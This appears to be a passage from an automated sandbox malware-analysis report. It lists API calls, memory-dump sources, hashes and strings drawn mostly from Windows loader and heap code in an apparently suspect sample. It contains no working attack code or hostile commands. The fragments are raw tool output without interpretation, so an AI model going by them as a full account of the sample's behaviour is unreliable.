                                                                • Opcode Fuzzy Hash: 175d564f5e2082ac18ee0e7691373d5f1b56a62285362adcd5aaadc332369405
                                                                • Instruction Fuzzy Hash: 46115976E41218B6EB119A61DC42FDF7738EF81B05F104116FA047B280DA7D5B478BD9

                                                                Control-flow Graph

                                                                APIs
                                                                • PostThreadMessageW.USER32(267_8V0-3,00000111,00000000,00000000), ref: 00413D10
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1543385980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_400000_r9856_7.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: MessagePostThread
                                                                • String ID: 267_8V0-3$267_8V0-3
                                                                • API String ID: 1836367815-80812108
                                                                • Opcode ID: b383dde672c82152daf3adc989a2d52c6e04e1b3a4d4eea0f2877e6736f2a2da
                                                                • Instruction ID: c40ebb111a8a715863815cf4496bd2e0fb54e4ca61a74a22b54d82e536711eed
                                                                • Opcode Fuzzy Hash: b383dde672c82152daf3adc989a2d52c6e04e1b3a4d4eea0f2877e6736f2a2da
                                                                • Instruction Fuzzy Hash: AB01C471E4121C76EB21A6A1EC02FDF7B7C9F41B54F408059FA047B2C1DAB85B068BE9

                                                                Control-flow Graph

                                                                APIs
                                                                • PostThreadMessageW.USER32(267_8V0-3,00000111,00000000,00000000), ref: 00413D10
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1543385980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • API ID: MessagePostThread
                                                                • String ID: 267_8V0-3$267_8V0-3
                                                                • API String ID: 1836367815-80812108

                                                                Control-flow Graph

                                                                APIs
                                                                • PostThreadMessageW.USER32(267_8V0-3,00000111,00000000,00000000), ref: 00413D10
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1543385980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • API ID: MessagePostThread
                                                                • String ID: 267_8V0-3$267_8V0-3
                                                                • API String ID: 1836367815-80812108

                                                                Control-flow Graph

                                                                APIs
                                                                • PostThreadMessageW.USER32(267_8V0-3,00000111,00000000,00000000), ref: 00413D10
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1543385980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • API ID: MessagePostThread
                                                                • String ID: 267_8V0-3$267_8V0-3
                                                                • API String ID: 1836367815-80812108

                                                                Control-flow Graph

                                                                control_flow_graph 84 42c523-42c567 call 404993 call 42d413 RtlFreeHeap
                                                                APIs
                                                                • RtlFreeHeap.NTDLL(00000000,00000004,00000000,79D5A5E9,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042C562
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1543385980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • API ID: FreeHeap
                                                                • String ID: NaA
                                                                • API String ID: 3298025750-4168634936

                                                                Control-flow Graph

                                                                control_flow_graph 113 42c4d3-42c514 call 404993 call 42d413 RtlAllocateHeap
                                                                APIs
                                                                • RtlAllocateHeap.NTDLL(00000104,?,004245CF,?,?,004245CF,?,00000104,?), ref: 0042C50F
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1543385980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • API ID: AllocateHeap
                                                                • String ID:
                                                                • API String ID: 1279760036-0

                                                                Control-flow Graph

                                                                control_flow_graph 123 42c573-42c5af call 404993 call 42d413 ExitProcess
                                                                APIs
                                                                • ExitProcess.KERNEL32(?,00000000,00000000,?,C994D8EC,?,?,C994D8EC), ref: 0042C5AA
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1543385980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • API ID: ExitProcess
                                                                • String ID:
                                                                • API String ID: 621844428-0

                                                                Control-flow Graph

                                                                control_flow_graph 128 1122c0a-1122c0f 129 1122c11-1122c18 128->129 130 1122c1f-1122c26 LdrInitializeThunk 128->130
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                • API ID:
                                                                • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                • API String ID: 0-2160512332
                                                                Strings
                                                                • Critical section debug info address, xrefs: 0115541F, 0115552E
                                                                • corrupted critical section, xrefs: 011554C2
                                                                • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0115540A, 01155496, 01155519
                                                                • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 011554E2
                                                                • undeleted critical section in freed memory, xrefs: 0115542B
                                                                • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 011554CE
                                                                • Critical section address., xrefs: 01155502
                                                                • double initialized or corrupted critical section, xrefs: 01155508
                                                                • Address of the debug info found in the active list., xrefs: 011554AE, 011554FA
                                                                • 8, xrefs: 011552E3
                                                                • Thread is in a state in which it cannot own a critical section, xrefs: 01155543
                                                                • Thread identifier, xrefs: 0115553A
                                                                • Critical section address, xrefs: 01155425, 011554BC, 01155534
                                                                • Invalid debug info address of this critical section, xrefs: 011554B6
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                • API ID:
                                                                • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                • API String ID: 0-2368682639
                                                                Strings
                                                                • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01152602
                                                                • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01152498
                                                                • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01152409
                                                                • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01152506
                                                                • @, xrefs: 0115259B
                                                                • RtlpResolveAssemblyStorageMapEntry, xrefs: 0115261F
                                                                • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 011524C0
                                                                • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 011525EB
                                                                • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 011522E4
                                                                • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01152624
                                                                • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01152412
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                • API ID:
                                                                • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                • API String ID: 0-4009184096
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                • API ID:
                                                                • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                • API String ID: 0-2515994595
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                • API ID:
                                                                • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                • API String ID: 0-1700792311
                                                                Strings
                                                                • VerifierDebug, xrefs: 01168CA5
                                                                • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01168A3D
                                                                • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01168A67
                                                                • VerifierDlls, xrefs: 01168CBD
                                                                • AVRF: -*- final list of providers -*- , xrefs: 01168B8F
                                                                • VerifierFlags, xrefs: 01168C50
                                                                • HandleTraces, xrefs: 01168C8F
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                • API ID:
                                                                • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                • API String ID: 0-3223716464
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                • API ID:
                                                                • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                • API String ID: 0-1109411897
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                • API ID:
                                                                • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                Strings
                                                                • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01139A01
                                                                • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01139A2A
                                                                • LdrpInitShimEngine, xrefs: 011399F4, 01139A07, 01139A30
                                                                • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 011399ED
                                                                • apphelp.dll, xrefs: 010D6496
                                                                • minkernel\ntdll\ldrinit.c, xrefs: 01139A11, 01139A3A
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                Strings
                                                                • RtlGetAssemblyStorageRoot, xrefs: 01152160, 0115219A, 011521BA
                                                                • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01152178
                                                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 011521BF
                                                                • SXS: %s() passed the empty activation context, xrefs: 01152165
                                                                • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0115219F
                                                                • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01152180
                                                                Similarity
                                                                • API ID:
                                                                • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                Strings
                                                                • Unable to build import redirection Table, Status = 0x%x, xrefs: 011581E5
                                                                • Loading import redirection DLL: '%wZ', xrefs: 01158170
                                                                • minkernel\ntdll\ldrredirect.c, xrefs: 01158181, 011581F5
                                                                • minkernel\ntdll\ldrinit.c, xrefs: 0111C6C3
                                                                • LdrpInitializeImportRedirection, xrefs: 01158177, 011581EB
                                                                • LdrpInitializeProcess, xrefs: 0111C6C4
                                                                Similarity
                                                                • API ID:
                                                                • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                APIs
                                                                  • Part of subcall function 01122DF0: LdrInitializeThunk.NTDLL ref: 01122DFA
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01120BA3
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01120BB6
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01120D60
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01120D74
                                                                Similarity
                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                • String ID:
                                                                Strings
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                Strings
                                                                • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0111855E
                                                                • @, xrefs: 01118591
                                                                • minkernel\ntdll\ldrinit.c, xrefs: 01118421
                                                                • LdrpInitializeProcess, xrefs: 01118422
                                                                Similarity
                                                                • API ID:
                                                                • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                Strings
                                                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 011522B6
                                                                • SXS: %s() passed the empty activation context, xrefs: 011521DE
                                                                • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 011521D9, 011522B1
                                                                • .Local, xrefs: 011128D8
                                                                Similarity
                                                                • API ID:
                                                                • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                Strings
                                                                • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01141028
                                                                • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 011410AE
                                                                • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0114106B
                                                                • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01140FE5
                                                                Similarity
                                                                • API ID:
                                                                • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                Strings
                                                                • LdrpDynamicShimModule, xrefs: 0114A998
                                                                • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0114A992
                                                                • apphelp.dll, xrefs: 01102462
                                                                • minkernel\ntdll\ldrinit.c, xrefs: 0114A9A2
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                Strings
                                                                • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 010F327D
                                                                • HEAP[%wZ]: , xrefs: 010F3255
                                                                • HEAP: , xrefs: 010F3264
                                                                Similarity
                                                                • API ID:
                                                                • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                Strings
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                Strings
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $@
                                                                Strings
                                                                Similarity
                                                                • API ID:
                                                                • String ID: FilterFullPath$UseFilter$\??\
                                                                Strings
                                                                • LdrpCheckModule, xrefs: 0114A117
                                                                • minkernel\ntdll\ldrinit.c, xrefs: 0114A121
                                                                • Failed to allocated memory for shimmed module list, xrefs: 0114A10F
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                Strings
                                                                Similarity
                                                                • API ID:
                                                                • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                Strings
                                                                • Failed to reallocate the system dirs string !, xrefs: 011582D7
                                                                • LdrpInitializePerUserWindowsDirectory, xrefs: 011582DE
                                                                • minkernel\ntdll\ldrinit.c, xrefs: 011582E8
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                • API String ID: 0-1783798831
                                                                Strings
                                                                • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0119C1C5
                                                                • PreferredUILanguages, xrefs: 0119C212
                                                                • @, xrefs: 0119C1F1
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                • API String ID: 0-2968386058
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                • API String ID: 0-1373925480
                                                                Strings
                                                                • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01164888
                                                                • minkernel\ntdll\ldrredirect.c, xrefs: 01164899
                                                                • LdrpCheckRedirection, xrefs: 0116488F
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                • API String ID: 0-3154609507
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                • API String ID: 0-2558761708
                                                                Strings
                                                                • Process initialization failed with status 0x%08lx, xrefs: 011620F3
                                                                • LdrpInitializationFailure, xrefs: 011620FA
                                                                • minkernel\ntdll\ldrinit.c, xrefs: 01162104
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                • API String ID: 0-2986994758
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID: ___swprintf_l
                                                                • String ID: #%u
                                                                • API String ID: 48624451-232158463
                                                                Strings
                                                                • LdrResSearchResource Enter, xrefs: 010EAA13
                                                                • LdrResSearchResource Exit, xrefs: 010EAA25
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                • API String ID: 0-4066393604
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: `$`
                                                                • API String ID: 0-197956300
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID: Legacy$UEFI
                                                                • API String ID: 2994545307-634100481
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: @$MUI
                                                                • API String ID: 0-17815947
                                                                Strings
                                                                • kLsE, xrefs: 010E0540
                                                                • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 010E063D
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                • API String ID: 0-2547482624
                                                                Strings
                                                                • RtlpResUltimateFallbackInfo Enter, xrefs: 010EA2FB
                                                                • RtlpResUltimateFallbackInfo Exit, xrefs: 010EA309
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                • API String ID: 0-2876891731
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID: Cleanup Group$Threadpool!
                                                                • API String ID: 2994545307-4008356553
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: MUI
                                                                • API String ID: 0-1339004836
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID: 0-3916222277
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID: 0-3916222277
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: GlobalTags
                                                                • API String ID: 0-1106856819
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: .mui
                                                                • API String ID: 0-1199573805
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: EXT-
                                                                • API String ID: 0-1948896318
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: BinaryHash
                                                                • String ID: #
                                                                • String ID: BinaryName
                                                                Strings
                                                                • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0116895E
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                • API String ID: 0-702105204
                                                                • Opcode ID: 9b3af302c94970a75dff370c6dca8dac8d5fc008e40342ad187490c2903e4d06
                                                                • Instruction ID: ee17b01268b4a36a64c7192d1e45cda33b85c3c30d1f8c5fead2efb622756397
                                                                • Opcode Fuzzy Hash: 9b3af302c94970a75dff370c6dca8dac8d5fc008e40342ad187490c2903e4d06
                                                                • Instruction Fuzzy Hash: 04017B31211306DFEB3C5B1ACD84B9ABF7DEFC1298B04002CF68106111DB2268A4C792
                                                                Memory Dump Source
